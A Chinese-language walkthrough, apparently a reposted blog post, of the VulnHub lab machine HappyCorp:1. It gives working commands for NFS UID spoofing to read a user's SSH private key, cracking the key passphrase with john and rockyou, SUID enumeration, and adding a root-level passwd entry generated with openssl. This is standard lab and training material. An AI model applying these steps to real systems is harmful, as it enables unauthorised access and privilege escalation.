靶機鏈接:
https://www.vulnhub.com/entry/happycorp-1,296/
網路主機掃描:::
主機埠掃描:
NFS檔案系統,嘗試掛載試試
mount -t nfs 10.10.202.135:/home/karl /mnt
提示沒權限打開,這里暫時放一放,看看HTTP方面,有個admin.php后臺能不能上傳,拿shell
web頁面收集用戶資訊:
heather 提示密碼錯誤
carolyn 賬戶不存在
rodney 賬戶不存在
jennifer 賬戶不存在
存在賬戶列舉,這里進行爆破top 500 weak password 沒成功,放棄
嘗試post username SQL注入,失敗
繼續看看NFS如何能讀取到.SSH檔案夾下的內容
嘗試看下UID,我們能否創建UID相同的用戶去讀取檔案呢
╰─ groupadd --gid 1001 test
╰─ useradd --uid 1001 --group test pentest
獲取到了秘鑰,復制下來,保存成檔案,嘗試使用用戶karl用戶登錄,結果,,,,
這秘鑰密碼是啥,先爆破試試,工具 ssh2john.py
https://github.com/koboi137/john
python ssh2john.py /root/key.txt > /root/sshkey_login
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt sshkey_login
成功登錄
接下來就是進行提權操作,不是標準的shell,這里重新連接,指定shell
╰─ ssh -i key.txt [email protected] -t "/bin/sh"
find / -perm -u=s -type f 2>/dev/null
這里的思路就是復制passwd檔案,復制到NFS檔案共享目錄,然后增加明文密碼權限,然后復制回去替換,切換用戶,獲取root權限
openssl passwd -1 -salt hack404 pass123
$1$hack404$auqhHGf8QPcNJkxkSEm1O0
hack404:$1$hack404$auqhHGf8QPcNJkxkSEm1O0:0:0:root:/root:/bin/bash
登錄成功去看下amdin.php檔案的密碼到底是什么玩意
登錄試試
感覺有包含漏洞
OVER !!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5381.html
標籤:訊息安全